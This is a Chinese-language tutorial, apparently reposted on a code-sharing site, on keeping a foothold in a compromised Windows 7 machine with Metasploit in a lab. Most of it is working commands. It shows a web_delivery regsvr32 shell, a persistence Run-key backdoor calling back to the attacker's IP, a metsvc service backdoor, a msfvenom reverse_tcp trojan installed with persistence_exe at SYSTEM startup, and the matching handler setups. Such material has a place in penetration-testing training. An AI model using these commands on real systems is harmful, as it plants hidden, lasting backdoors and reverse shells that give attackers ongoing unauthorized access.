MSF權限維持


MSF權限維持

環境搭建

目標機:win7 ip:192.168.224.133

攻擊機:kali linux ip:192.168.224.129

首先使用web_delivery模塊的regsvr32獲取shell,

1、啟動msfconsole

2、使用web_delivery模塊

3、設置payload

4、設置監聽主機和端口

5、設置Regsvr32目標,

6、run運行,生成一個可執行文件,

7、將文件拿到win7目標機上運行。

8、輸入sessions,查看session內容

9、輸入sessions -i 1 ,可以拿到目標機返回的會話

使用metasploit自帶的后門進行權限維持

一、persistence啟動項后門

run persistence -h ###查看幫助

run persistence -X -i 2 -p 8888 -r 192.168.224.129 ##### -X指定啟動的方式為開機自啟動,-i反向連接的時間間隔(2s) –r 指定攻擊者的IP

在目標機C盤 C:\Users\plume\AppData\Local\Temp\下生成了一個vbs文件,

在注冊表HKLM\Software\Microsoft\Windows\CurrentVersion\Run下加入了開機啟動項

連接后門,拿到返回的會話

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.224.129

set LPORT 8888

run

二、metsvc服務后門

在C:\Users\plume\AppData\Local\Temp\上傳了三個文件(metsrv.x86.dll、metsvc-server.exe、metsvc.exe),通過服務啟動,服務名為meterpreter

run metsvc –h # 查看幫助

run metsvc –A #自動安裝后門

run metsvc -r #卸載現有的meterpreter服務(已生成的文件需要自己刪除)

可以看到成功生成了后門文件,並且啟動了meterpreter服務。

連接后門,拿到返回會話

use exploit/multi/handler

set payload windows/metsvc_bind_tcp

set RHOST 192.168.224.133

set LPORT 31337

run

三、通過persistence_exe自定義后門文件

1、使用msfvenom生成一個木馬文件。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.224.129 lport=6666 -f exe -o ~/233.exe

2、通過persistence_exe設置參數,運行,成功返回shell,

run post/windows/manage/persistence_exe rexename=233.exe rexepath=~/233.exe session=1 startup=SYSTEM

rexename:上傳到目標機的木馬文件

rexepath:當前kali中木馬所在的完整路徑

session:之前獲取的session會話

startup:運行該后門的權限

3、連接后門,並將目標機關機重啟,可以成功返回會話。

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.224.129

set lport 6666

run


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM